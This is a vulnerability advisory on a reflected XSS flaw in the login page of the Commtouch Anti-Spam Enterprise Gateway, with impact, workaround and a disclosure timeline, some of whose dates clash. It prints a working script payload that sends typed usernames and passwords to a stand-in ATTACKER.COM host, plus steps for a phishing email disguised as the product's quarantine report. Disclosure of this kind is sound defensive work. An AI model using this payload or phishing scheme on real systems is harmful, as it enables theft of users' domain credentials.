|
|
|
|
| |
Commtouch Anti-Spam Enterprise Gateway is "an anti spam solution, protecting enterprise networks for the ever increasing spam emails. The anti spam solution includes a web application console which enables the enterprise users to check the blocked messages, release messages, apply blocking rules and more".
A reflected XSS vulnerability was discovered in the Commtouch product login page which enables an attacker to steal a victim's credential to the corporate network. Since the login credentials are usually the victim's credentials to the domain, it is a high risk vulnerability which puts the whole domain passwords at risk. |
| |
Credit:
The information has been provided by Erez Metula.
|
| |
Apart from being used as a regular reflected XSS attack vector, for example by sending a malicious link to the user, there is another attack vector that can be used which derives from the specific way the product works.
The product sends a periodic email report to the user, listing the emails that were identified as spam and were blocked. The user is given an option to release / approve the mail, by clicking on the corresponding link.
Clicking on the link brings the login page, in which the user enters his domain credentials in order to access the web application and commit the action.
In case an attacker sends a fake link pretending to come from the product and containing the XSS link inside it, the user can be easily enticed to supply his credentials in order to access the product console
Exploit:
As explained above, exploitation can be achieved by traditional XSS methods by utilizing the following pattern:
http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&PARAMS=XXX"> <SCRIPT>PAYLOAD </SCRIPT><input%20type="hidden"%20name="XXX"%20value="X
More interesting is a specific exploitation tied to the product behavior, in which an attacker will fake the "My Quarantine Report" coming from the product.
Steps:
1) Setting up a credential stealing page at http://ATTACKER.COM/stealer
2) Building a fake "My Querentine Report" email with some enticing "release me" email
3) Replacing the content of the contained links inside the mail to
http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&DIRECTTO=3&PARAMS=XXX"> <script>function SendCredentials(){ img = new Image(); img.src="http://ATTACKER.COM/stealer/?userid=" + document.forms[0].LoginName.value + "&password=" + document.forms[0].LoginPass.value;} function HandleSubmit(){ document.forms[0].onsubmit= SendCredentials; } window.onload = HandleSubmit;</script><input%20type="hidden"%20name="Params2"%20value="x
4) Send the fake email, pretending to be from the commtouch service
Impact:
Since the login credentials are usually the victim's credentials to the domain, it is a high risk vulnerability which puts the whole domain passwords at risk.
Workaround:
Although originally reported for version V4 at 2006, the problem was not solved even in version V5. There is no official solution yet. The only workaround possible is to blacklist HTML / SCRIPT tags, which can be bypassed relatively easily and is not considered a very good solution.
Vendor response:
Commtouch has been informed on the 7/12/06 by e-mail to their support. Commtouch didn't not fix the problem by the time of publish.
Disclosure Timeline:
26/12/06 - Identification of the flaw
27/12/06 - Reporting the flaw to Commtouch by email
28/06/06 - Response from Commtouch, asking for more description
03/01/07 - Providing the full description to Commtouch
22/01/07 - Commtouch acknowledge of the vulnerability
22/01/07 - Commtouch response for an unknown deliver time for a patch
27/01/07 - Commtouch was notified about full disclosure of this information to the public
26/06/08 - Release of this information, after no patch nor a fix at the version V5 release
|
|
|
|
|
|
|
